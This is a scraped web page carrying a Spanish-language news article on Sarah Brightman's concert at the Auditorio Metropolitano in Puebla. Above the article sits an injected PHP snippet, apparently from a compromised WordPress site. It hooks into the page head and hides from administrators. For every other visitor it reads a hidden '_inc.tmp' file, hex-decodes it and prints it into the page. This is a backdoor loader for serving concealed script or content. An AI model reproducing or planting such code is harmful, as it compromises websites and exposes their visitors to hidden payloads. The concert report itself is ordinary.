if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Sarah Brightman ofrece espectacular show en PUEBLA – La Opinión Universitaria La Opinión Universitaria
Menu

Sarah Brightman ofrece espectacular show en PUEBLA

 

 

 

 

Por: Carlos Linares Mendoza

Fotos: Puebla Expres / Carlos Linares

LARGAS filas de automovilistas se hicieron en la zona de Angelópolis, el motivo principal la presentación de la soprano más famosa del mundo, Sarah Brightman.

El reloj marcaba las 21:10hrs, cuando las luces se apagaron, el show había comenzado, la cantante salió vestida de negro con dorado y una corona, para comenzar su elegante velada, luego cambio su atuendo por un vestido en negro con flores, era una noche importante, tenía seis años de no pisar suelo poblano.

La presentación dio inicio con “Fleurs du Mal” de su más reciente producción, le siguieron “Stranger in Paraside”, “Miracle” y “Carpe Diem”, que sonaron con su potente voz, acompañada de músicos que han estado con ella en su gira mundial “HYMN”, así como 32 coros entre tenores y sopranos, 20 músicos de orquesta clásica acompañados por el maestro Omar Ruíz, todos poblanos, que la acompañaron en su show.

Uno de los temas más esperados de la noche fue “Hijo de la luna”, entonado en español; cambios de vestuario hacían que luciera aún más su potente voz, con más de 25 canciones que fueron parte del espectáculo.
Fans provenientes de Tlaxcala, Veracruz, Querétaro, Oaxaca y el Estado de México, viajaron para poder acompañarla y conocerla.

Con diez cambios de vestuario, la inglesa Sarah Brightman se dejó querer, lanzando en varias ocasiones besos efusivos a los asistentes y agradeciendo el cariño de los poblanos, mencionando en todo momento el nombre del estado.

El show tuvo un intermedio de 15min, tiempo para que muchos aprovecharan en sacar sus celulares, ya que estaba prohibido usarlos durante el evento. Las luces se apagaron y Sarah salió al escenario luciendo un vestido dorado que más tarde cambió por un vestido en verde.

Entre los temas más esperados estuvieron “Ave María”, “Phantom of the opera”, “I Will be with you”, “Fly to paradise”, etc… Uno de los momentos más esperados fue cuando comenzó a entonar “Time to say goodbye”, tocando ella misma el piano. Más tarde tocó el turno de “Sogni” a dueto con Vicent Niclo.

Sarah se ha identificado por cantar ópera mezclada el jazz, rock y pop, que la hacen ser auténtica y especial. Entre sus invitados estuvieron los tenores Vicent Niclo y Narcis.

Con un Auditorio Metropolitano casi luciendo a todo esplendor, la soprano vestida de negro, concluyó la presentación poniendo en varios ocasiones de pie a los asistentes, con un espectáculo que concluyó a las 23:35hrs.

La cantante de 58 años, se dio tiempo de cumplir con los M&G de fans que compraron el paquete, así mismo de quienes ganaron convivencias, luciendo un onceavo vestuario en color azul, así mismo firmó un cuadro enmarcado que quedará de recuerdo en la galería de artistas que se han presentado en el emblemático Auditorio Metropolitano.

Cabe señalar el fin de semana concluyó su gira por nuestro país en la Arena Ciudad de México, para continuar por 27 ciudades de Estados Unidos, más tarde tocará el turno a Canadá visitando 3 ciudades y así seguirá hasta llegar a Europa.

 

No comments

Deja una respuesta

Tweets recientes